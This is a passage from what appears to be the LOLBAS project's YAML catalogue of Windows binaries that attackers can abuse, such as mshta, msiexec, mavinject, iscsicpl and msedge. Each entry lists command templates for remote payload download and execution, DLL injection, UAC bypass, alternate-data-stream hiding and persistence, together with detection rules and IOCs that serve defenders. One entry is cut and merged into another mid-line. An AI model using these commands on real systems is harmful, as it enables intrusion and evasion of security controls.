  - Elastic: https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/defense_evasion_installutil_beacon.toml
  - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml
Resources:
  - Link: https://pentestlab.blog/2017/05/08/applocker-bypass-installutil/
  - Link: https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_12
  - Link: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md
  - Link: https://www.blackhillsinfosec.com/powershell-without-powershell-how-to-bypass-application-whitelisting-environment-restrictions-av/
  - Link: https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
  - Link: https://docs.microsoft.com/en-us/dotnet/framework/tools/installutil-exe-installer-tool
Acknowledgement:
  - Person: Casey Smith
    Handle: '@subtee'
  - Person: Nir Chako (Pentera)
    Handle: '@C_h4ck_0'

================================================
FILE: yml/OSBinaries/Iscsicpl.yml
================================================
---
Name: iscsicpl.exe
Description: Microsoft iSCSI Initiator Control Panel tool
Author: Ekitji
Created: 2025-08-17
Commands:
  - Command: c:\windows\syswow64\iscsicpl.exe # SysWOW64 binary
    Description: c:\windows\syswow64\iscsicpl.exe has a DLL injection through `C:\Users\\AppData\Local\Microsoft\WindowsApps\ISCSIEXE.dll`, resulting in UAC bypass.
    Usecase: Execute a custom DLL via a trusted high-integrity process without a UAC prompt.
    Category: UAC Bypass
    Privileges: User
    MitreID: T1548.002
    OperatingSystem: Windows 10, Windows 11
    Tags:
      - Execute: DLL
  - Command: iscsicpl.exe # SysWOW64/System32 binary
    Description: Both `c:\windows\system32\iscsicpl.exe` and `c:\windows\system64\iscsicpl.exe` have a UAC bypass through launching iscsicpl.exe, then navigating into the Configuration tab, clicking Report, then launching your custom command.
    Usecase: Execute a binary or script as a high-integrity process without a UAC prompt.
    Category: UAC Bypass
    Privileges: User
    MitreID: T1548.002
    OperatingSystem: Windows 10, Windows 11
    Tags:
      - Execute: CMD
      - Application: GUI
Full_Path:
  - Path: c:\windows\system32\iscsicpl.exe # UAC Bypass by breaking out from application
  - Path: c:\windows\syswow64\iscsicpl.exe # UAC Bypass by DLL injection and breakout from application
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/image_load/image_load_uac_bypass_iscsicpl.yml
  - IOC: C:\Users\\AppData\Local\Microsoft\WindowsApps\ISCSIEXE.dll
  - IOC: Suspicious child process of iscsicpl.exe such as cmd, powershell etc.
Resources:
  - Link: https://learn.microsoft.com/en-us/windows-server/storage/iscsi/iscsi-initiator-portal
  - Link: https://github.com/hackerhouse-opensource/iscsicpl_bypassUAC
Acknowledgement:
  - Person: hacker.house
  - Person: Ekitji
    Handle: '@eki_erk'

================================================
FILE: yml/OSBinaries/Jsc.yml
================================================
---
Name: Jsc.exe
Description: Binary file used by .NET to compile JavaScript code to .exe or .dll format
Author: Oddvar Moe
Created: 2019-05-31
Commands:
  - Command: jsc.exe {PATH:.js}
    Description: Use jsc.exe to compile JavaScript code stored in the provided .JS file and generate a .EXE file with the same name.
    Usecase: Compile attacker code on system. Bypass defensive counter measures.
    Category: Compile
    Privileges: User
    MitreID: T1127
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: JScript
  - Command: jsc.exe /t:library {PATH:.js}
    Description: Use jsc.exe to compile JavaScript code stored in the .JS file and generate a DLL file with the same name.
    Usecase: Compile attacker code on system. Bypass defensive counter measures.
    Category: Compile
    Privileges: User
    MitreID: T1127
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: JScript
Full_Path:
  - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Jsc.exe
  - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Jsc.exe
  - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Jsc.exe
  - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Jsc.exe
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/35a7244c62820fbc5a832e50b1e224ac3a1935da/rules/windows/process_creation/proc_creation_win_lolbin_jsc.yml
  - IOC: Jsc.exe should normally not run on a system unless it is used for development.
Resources:
  - Link: https://twitter.com/DissectMalware/status/998797808907046913
  - Link: https://www.phpied.com/make-your-javascript-a-windows-exe/
Acknowledgement:
  - Person: Malwrologist
    Handle: '@DissectMalware'

================================================
FILE: yml/OSBinaries/Ldifde.yml
================================================
---
Name: Ldifde.exe
Description: Creates, modifies, and deletes LDAP directory objects.
Author: Grzegorz Tworek
Created: 2022-08-31
Commands:
  - Command: Ldifde -i -f {PATH:.ldf}
    Description: Import the specified .ldf file into LDAP. If the file contains an http-based attrval-spec such as `thumbnailPhoto:< http://example.org/somefile.txt`, the file will be downloaded into the IE temp folder.
    Usecase: Download file from Internet
    Category: Download
    Privileges: Administrator
    MitreID: T1105
    OperatingSystem: Windows Server with AD Domain Services role, Windows 10 with AD LDS role.
Full_Path:
  - Path: c:\windows\system32\ldifde.exe
  - Path: c:\windows\syswow64\ldifde.exe
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/3d172914f6c2bd5c2b5ed471bf0657a662d395af/rules/windows/process_creation/proc_creation_win_ldifde_export.yml
  - Sigma: https://github.com/SigmaHQ/sigma/blob/3d172914f6c2bd5c2b5ed471bf0657a662d395af/rules/windows/process_creation/proc_creation_win_ldifde_file_load.yml
  - Sigma: https://github.com/SigmaHQ/sigma/blob/3d172914f6c2bd5c2b5ed471bf0657a662d395af/rules-emerging-threats/2019/TA/APT31/proc_creation_win_apt_apt31_judgement_panda.yml
Resources:
  - Link: https://twitter.com/0gtweet/status/1564968845726580736
Acknowledgement:
  - Person: Grzegorz Tworek
    Handle: '@0gtweet'

================================================
FILE: yml/OSBinaries/Makecab.yml
================================================
---
Name: Makecab.exe
Description: Binary to package existing files into a cabinet (.cab) file
Author: Oddvar Moe
Created: 2018-05-25
Commands:
  - Command: makecab {PATH_ABSOLUTE:.exe} {PATH_ABSOLUTE}:autoruns.cab
    Description: Compresses the target file into a CAB file stored in the Alternate Data Stream (ADS) of the target file.
    Usecase: Hide data compressed into an alternate data stream
    Category: ADS
    Privileges: User
    MitreID: T1564.004
    OperatingSystem: Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Type: Compression
  - Command: makecab {PATH_SMB:.exe} {PATH_ABSOLUTE}:file.cab
    Description: Compresses the target file into a CAB file stored in the Alternate Data Stream (ADS) of the target file.
    Usecase: Hide data compressed into an alternate data stream
    Category: ADS
    Privileges: User
    MitreID: T1564.004
    OperatingSystem: Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Type: Compression
  - Command: makecab {PATH_SMB:.exe} {PATH_ABSOLUTE:.cab}
    Description: Downloads and compresses the target file and stores it in the target file.
    Usecase: Download file and compress into a cab file
    Category: Download
    Privileges: User
    MitreID: T1105
    OperatingSystem: Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Type: Compression
  - Command: makecab /F {PATH:.ddf}
    Description: Execute makecab commands as defined in the specified Diamond Definition File (.ddf); see resources for the format specification.
    Usecase: Bypass command-line based detections
    Category: Execute
    Privileges: User
    MitreID: T1036
    OperatingSystem: Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Type: Compression
Full_Path:
  - Path: C:\Windows\System32\makecab.exe
  - Path: C:\Windows\SysWOW64\makecab.exe
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_susp_alternate_data_streams.yml
  - Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml
  - IOC: Makecab retrieving files from Internet
  - IOC: Makecab storing data into alternate data streams
Resources:
  - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
  - Link: https://ss64.com/nt/makecab-directives.html
  - Link: https://www.pearsonhighered.com/assets/samplechapter/0/7/8/9/0789728583.pdf
  - Link: https://learn.microsoft.com/en-us/previous-versions/bb417343(v=msdn.10)#makecab-application
Acknowledgement:
  - Person: Oddvar Moe
    Handle: '@oddvarmoe'

================================================
FILE: yml/OSBinaries/Mavinject.yml
================================================
---
Name: Mavinject.exe
Description: Used by App-v in Windows
Author: Oddvar Moe
Created: 2018-05-25
Commands:
  - Command: MavInject.exe 3110 /INJECTRUNNING {PATH_ABSOLUTE:.dll}
    Description: Inject evil.dll into a process with PID 3110.
    Usecase: Inject dll file into running process
    Category: Execute
    Privileges: User
    MitreID: T1218.013
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: DLL
  - Command: Mavinject.exe 4172 /INJECTRUNNING {PATH_ABSOLUTE}:file.dll
    Description: Inject file.dll stored as an Alternate Data Stream (ADS) into a process with PID 4172
    Usecase: Inject dll file into running process
    Category: ADS
    Privileges: User
    MitreID: T1564.004
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: DLL
Full_Path:
  - Path: C:\Windows\System32\mavinject.exe
  - Path: C:\Windows\SysWOW64\mavinject.exe
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_mavinject_process_injection.yml
  - IOC: mavinject.exe should not run unless APP-v is in use on the workstation
Resources:
  - Link: https://twitter.com/gN3mes1s/status/941315826107510784
  - Link: https://twitter.com/Hexcorn/status/776122138063409152
  - Link: https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/
Acknowledgement:
  - Person: Giuseppe N3mes1s
    Handle: '@gN3mes1s'
  - Person: Oddvar Moe
    Handle: '@oddvarmoe'

================================================
FILE: yml/OSBinaries/Microsoft.Workflow.Compiler.yml
================================================
---
Name: Microsoft.Workflow.Compiler.exe
Description: A utility included with .NET that is capable of compiling and executing C# or VB.net code.
Author: Conor Richard
Created: 2018-10-22
Commands:
  - Command: Microsoft.Workflow.Compiler.exe {PATH} {PATH:.log}
    Description: Compile and execute C# or VB.net code in a XOML file referenced in the first argument (any extension accepted).
    Usecase: Compile and run code
    Category: Execute
    Privileges: User
    MitreID: T1127
    OperatingSystem: Windows 10S, Windows 11
    Tags:
      - Execute: VB.Net
      - Execute: Csharp
  - Command: Microsoft.Workflow.Compiler.exe {PATH} {PATH:.log}
    Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.txt file.
    Usecase: Compile and run code
    Category: Execute
    Privileges: User
    MitreID: T1127
    OperatingSystem: Windows 10S, Windows 11
    Tags:
      - Execute: XOML
  - Command: Microsoft.Workflow.Compiler.exe {PATH} {PATH:.log}
    Description: Compile and execute C# or VB.net code in a XOML file referenced in the test.txt file.
    Usecase: Compile and run code
    Category: AWL Bypass
    Privileges: User
    MitreID: T1127
    OperatingSystem: Windows 10S, Windows 11
    Tags:
      - Execute: XOML
Full_Path:
  - Path: C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_workflow_compiler.yml
  - Splunk: https://github.com/splunk/security_content/blob/961a81d4a5cb5c5febec4894d6d812497171a85c/detections/endpoint/suspicious_microsoft_workflow_compiler_usage.yml
  - Splunk: https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_microsoft_workflow_compiler_rename.yml
  - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml
  - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml
  - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
  - IOC: Microsoft.Workflow.Compiler.exe would not normally be run on workstations.
  - IOC: The presence of csc.exe or vbc.exe as child processes of Microsoft.Workflow.Compiler.exe
  - IOC: Presence of " {PATH:.b64}
    Description: Edge will silently download the file. File extension should be .html and binaries should be encoded.
    Usecase: Download file from the internet
    Category: Download
    Privileges: User
    MitreID: T1105
    OperatingSystem: Windows 10, Windows 11
  - Command: msedge.exe --disable-gpu-sandbox --gpu-launcher="{CMD} &&"
    Description: Edge spawns cmd.exe as a child process of msedge.exe and executes the specified command
    Usecase: Executes a process under a trusted Microsoft signed binary
    Category: Execute
    Privileges: User
    MitreID: T1218.015
    OperatingSystem: Windows 10, Windows 11
    Tags:
      - Execute: CMD
Full_Path:
  - Path: c:\Program Files\Microsoft\Edge\Application\msedge.exe
  - Path: c:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/process_creation/proc_creation_win_browsers_msedge_arbitrary_download.yml
  - Sigma: https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/process_creation/proc_creation_win_browsers_chromium_headless_file_download.yml
Resources:
  - Link: https://twitter.com/mrd0x/status/1478116126005641220
  - Link: https://twitter.com/mrd0x/status/1478234484881436672
Acknowledgement:
  - Person: mr.d0x
    Handle: '@mrd0x'

================================================
FILE: yml/OSBinaries/Mshta.yml
================================================
---
Name: Mshta.exe
Description: Used by Windows to execute html applications. (.hta)
Author: Oddvar Moe
Created: 2018-05-25
Commands:
  - Command: mshta.exe {PATH:.hta}
    Description: Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript.
    Usecase: Execute code
    Category: Execute
    Privileges: User
    MitreID: T1218.005
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: HTA
      - Execute: Remote
  - Command: mshta.exe vbscript:Close(Execute("GetObject(""script:{REMOTEURL:.sct}"")"))
    Description: Executes VBScript supplied as a command line argument.
    Usecase: Execute code
    Category: Execute
    Privileges: User
    MitreID: T1218.005
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: VBScript
  - Command: mshta.exe javascript:a=GetObject("script:{REMOTEURL:.sct}").Exec();close();
    Description: Executes JavaScript supplied as a command line argument.
    Usecase: Execute code
    Category: Execute
    Privileges: User
    MitreID: T1218.005
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: JScript
  - Command: mshta.exe "{PATH_ABSOLUTE}:file.hta"
    Description: Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript.
    Usecase: Execute code hidden in alternate data stream
    Category: ADS
    Privileges: User
    MitreID: T1218.005
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 (Does not work on 1903 and newer)
    Tags:
      - Execute: HTA
  - Command: mshta.exe {REMOTEURL}
    Description: It will download a remote payload and place it in INetCache.
Usecase: Downloads payload from remote server Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Download: INetCache Full_Path: - Path: C:\Windows\System32\mshta.exe - Path: C:\Windows\SysWOW64\mshta.exe Code_Sample: - Code: https://gist.github.com/bohops/6ded40c4989c673f2e30b9a6c1985019 Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_mshta_susp_pattern.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_use_mhsta.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_mshta_lethalhta_technique.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_mshta_javascript.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/file/file_event/file_event_win_net_cli_artefact.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/image_load/image_load_susp_script_dotnet_clr_dll_load.yml - Elastic: https://github.com/elastic/detection-rules/blob/f8f643041a584621e66cf8e6d534ad3db92edc29/rules/windows/defense_evasion_mshta_beacon.toml - Elastic: https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/lateral_movement_dcom_hta.toml - Elastic: https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml - Splunk: https://github.com/splunk/security_content/blob/08ed88bd88259c03c771c30170d2934ed0a8f878/stories/suspicious_mshta_activity.yml - Splunk: 
https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_mshta_renamed.yml - Splunk: https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_mshta_spawn.yml - Splunk: https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/suspicious_mshta_child_process.yml - Splunk: https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_mshta_url_in_command_line.yml - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules - IOC: mshta.exe executing raw or obfuscated script within the command-line - IOC: General usage of HTA file - IOC: msthta.exe network connection to Internet/WWW resource - IOC: DotNet CLR libraries loaded into mshta.exe - IOC: DotNet CLR Usage Log - mshta.exe.log Resources: - Link: https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_4 - Link: https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/mshta.sct - Link: https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/ - Link: https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/ Acknowledgement: - Person: Casey Smith Handle: '@subtee' - Person: Oddvar Moe Handle: '@oddvarmoe' - Person: Nir Chako (Pentera) Handle: '@C_h4ck_0' ================================================ FILE: yml/OSBinaries/Msiexec.yml ================================================ --- Name: Msiexec.exe Description: Used by Windows to execute msi files Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: msiexec /quiet /i {PATH:.msi} Description: Installs the target .MSI file silently. 
Usecase: Execute custom made msi file with attack code Category: Execute Privileges: User MitreID: T1218.007 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: MSI - Command: msiexec /q /i {REMOTEURL} Description: Installs the target remote & renamed .MSI file silently. Usecase: Execute custom made msi file with attack code from remote server Category: Execute Privileges: User MitreID: T1218.007 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: MSI - Execute: Remote - Command: msiexec /y {PATH_ABSOLUTE:.dll} Description: Calls DllRegisterServer to register the target DLL. Usecase: Execute dll files Category: Execute Privileges: User MitreID: T1218.007 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: DLL - Execute: Remote - Command: msiexec /z {PATH_ABSOLUTE:.dll} Description: Calls DllUnregisterServer to un-register the target DLL. Usecase: Execute dll files Category: Execute Privileges: User MitreID: T1218.007 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: DLL - Execute: Remote - Command: msiexec /i {PATH_ABSOLUTE:.msi} TRANSFORMS="{REMOTEURL:.mst}" /qb Description: Installs the target .MSI file from a remote URL, the file can be signed by vendor. Additional to the file a transformation file will be used, which can contains malicious code or binaries. The /qb will skip user input. 
Usecase: Install trusted and signed msi file, with additional attack code as transformation file, from a remote server Category: Execute Privileges: User MitreID: T1218.007 OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: MSI - Execute: MST - Execute: Remote Full_Path: - Path: C:\Windows\System32\msiexec.exe - Path: C:\Windows\SysWOW64\msiexec.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_msiexec_web_install.yml - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_msiexec_masquerading.yml - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml - Splunk: https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/uninstall_app_using_msiexec.yml - IOC: msiexec.exe retrieving files from Internet Resources: - Link: https://pentestlab.blog/2017/06/16/applocker-bypass-msiexec/ - Link: https://twitter.com/PhilipTsukerman/status/992021361106268161 - Link: https://badoption.eu/blog/2023/10/03/MSIFortune.html Acknowledgement: - Person: netbiosX Handle: '@netbiosX' - Person: Philip Tsukerman Handle: '@PhilipTsukerman' ================================================ FILE: yml/OSBinaries/Netsh.yml ================================================ --- Name: Netsh.exe Description: Netsh is a Windows tool used to manipulate network interface settings. 
Author: Freddie Barr-Smith Created: 2019-12-24 Commands: - Command: netsh.exe add helper {PATH_ABSOLUTE:.dll} Description: Use Netsh in order to execute a .dll file and also gain persistence, every time the netsh command is called Usecase: Proxy execution of .dll Category: Execute Privileges: Admin MitreID: T1546.007 OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: DLL Full_Path: - Path: C:\WINDOWS\System32\Netsh.exe - Path: C:\WINDOWS\SysWOW64\Netsh.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_netsh_helper_dll_persistence.yml - Splunk: https://github.com/splunk/security_content/blob/2b87b26bdc2a84b65b1355ffbd5174bdbdb1879c/detections/endpoint/processes_launching_netsh.yml - Splunk: https://github.com/splunk/security_content/blob/08ed88bd88259c03c771c30170d2934ed0a8f878/detections/deprecated/processes_created_by_netsh.yml - IOC: Netsh initiating a network connection Resources: - Link: https://freddiebarrsmith.com/trix/trix.html - Link: https://htmlpreview.github.io/?https://github.com/MatthewDemaske/blogbackup/blob/master/netshell.html - Link: https://liberty-shell.com/sec/2018/07/28/netshlep/ Acknowledgement: - Person: 'Freddie Barr-Smith' Handle: - Person: 'Riccardo Spolaor' Handle: - Person: 'Mariano Graziano' Handle: - Person: 'Xabier Ugarte-Pedrero' Handle: ================================================ FILE: yml/OSBinaries/Ngen.yml ================================================ --- Name: Ngen.exe Description: Microsoft Native Image Generator. Author: Avihay Eldad Created: 2024-02-19 Commands: - Command: ngen.exe {REMOTEURL} Description: Downloads payload from remote server using the Microsoft Native Image Generator utility. Usecase: It will download a remote payload and place it in INetCache. 
    Category: Download
    Privileges: User
    MitreID: T1105
    OperatingSystem: Windows 10, Windows 11
    Tags:
      - Download: INetCache
Full_Path:
  - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\ngen.exe
  - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\ngen.exe
  - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe
  - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe
Acknowledgement:
  - Person: Avihay Eldad
    Handle: '@AvihayEldad'

================================================
FILE: yml/OSBinaries/Odbcconf.yml
================================================
---
Name: Odbcconf.exe
Description: Used in Windows for managing ODBC connections
Author: Oddvar Moe
Created: 2018-05-25
Commands:
  - Command: odbcconf /a {REGSVR {PATH_ABSOLUTE:.dll}}
    Description: Execute DllRegisterServer from DLL specified.
    Usecase: Execute a DLL file using technique that can evade defensive countermeasures
    Category: Execute
    Privileges: User
    MitreID: T1218.008
    OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: DLL
  - Command: |
      odbcconf INSTALLDRIVER "lolbas-project|Driver={PATH_ABSOLUTE:.dll}|APILevel=2"
      odbcconf configsysdsn "lolbas-project" "DSN=lolbas-project"
    Description: Install a driver and load the DLL. Requires administrator privileges.
    Usecase: Execute dll file using technique that can evade defensive countermeasures
    Category: Execute
    Privileges: User
    MitreID: T1218.008
    OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: DLL
  - Command: odbcconf -f {PATH:.rsp}
    Description: Load DLL specified in target .RSP file. See the Code Sample section for an example .RSP file.
    Usecase: Execute dll file using technique that can evade defensive countermeasures
    Category: Execute
    Privileges: Administrator
    MitreID: T1218.008
    OperatingSystem: Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Full_Path:
  - Path: C:\Windows\System32\odbcconf.exe
  - Path: C:\Windows\SysWOW64\odbcconf.exe
Code_Sample:
  - Code: https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/58b5eb751379501aa237275f14381f0902e979a5/Archive-Old-Version/OSBinaries/Payload/file.rsp
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_odbcconf_response_file.yml
  - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_odbcconf_response_file_susp.yml
  - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml
  - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml
Resources:
  - Link: https://gist.github.com/NickTyrer/6ef02ce3fd623483137b45f65017352b
  - Link: https://github.com/woanware/application-restriction-bypasses
  - Link: https://www.hexacorn.com/blog/2020/08/23/odbcconf-lolbin-trifecta/
Acknowledgement:
  - Person: Casey Smith
    Handle: '@subtee'
  - Person: Adam
    Handle: '@Hexacorn'

================================================
FILE: yml/OSBinaries/OfflineScannerShell.yml
================================================
---
Name: OfflineScannerShell.exe
Description: Windows Defender Offline Shell
Author: 'Elliot Killick'
Created: 2021-08-16
Commands:
  - Command: OfflineScannerShell
    Description: Execute mpclient.dll library in the current working directory
    Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism
    Category: Execute
    Privileges: Administrator
    MitreID: T1218
    OperatingSystem: Windows 10, Windows 11
    Tags:
      - Execute: DLL
Full_Path:
  - Path: C:\Program Files\Windows Defender\Offline\OfflineScannerShell.exe
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/bea6f18d350d9c9fdc067f93dde0e9b11cc22dc2/rules/windows/process_creation/proc_creation_win_lolbas_offlinescannershell.yml
  - IOC: OfflineScannerShell.exe should not be run on a normal workstation
Acknowledgement:
  - Person: Elliot Killick
    Handle: '@elliotkillick'

================================================
FILE: yml/OSBinaries/OneDriveStandaloneUpdater.yml
================================================
---
Name: OneDriveStandaloneUpdater.exe
Description: OneDrive Standalone Updater
Author: 'Elliot Killick'
Created: 2021-08-22
Commands:
  - Command: OneDriveStandaloneUpdater
    Description: Download a file from the web address specified in `HKCU\Software\Microsoft\OneDrive\UpdateOfficeConfig\UpdateRingSettingURLFromOC`. `ODSUUpdateXMLUrlFromOC` and `UpdateXMLUrlFromOC` must be equal to non-empty string values in that same registry key. `UpdateOfficeConfigTimestamp` is a UNIX epoch time which must be set to a large QWORD such as 99999999999 (in decimal) to indicate the URL cache is good. The downloaded file will be in `%localappdata%\OneDrive\StandaloneUpdater\PreSignInSettingsConfig.json`.
    Usecase: Download a file from the Internet without executing any anomalous executables with suspicious arguments
    Category: Download
    Privileges: User
    MitreID: T1105
    OperatingSystem: Windows 10
Full_Path:
  - Path: 'C:\Users\\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe'
  - Path: C:\Program Files\Microsoft OneDrive\OneDriveStandaloneUpdater.exe
  - Path: C:\Program Files (x86)\Microsoft OneDrive\OneDriveStandaloneUpdater.exe
Detection:
  - IOC: HKCU\Software\Microsoft\OneDrive\UpdateOfficeConfig\UpdateRingSettingURLFromOC being set to a suspicious non-Microsoft controlled URL
  - IOC: Reports of downloading from suspicious URLs in %localappdata%\OneDrive\setup\logs\StandaloneUpdate_*.log files
  - Sigma: https://github.com/SigmaHQ/sigma/blob/ff5102832031425f6eed011dd3a2e62653008c94/rules/windows/registry/registry_set/registry_set_lolbin_onedrivestandaloneupdater.yml
Resources:
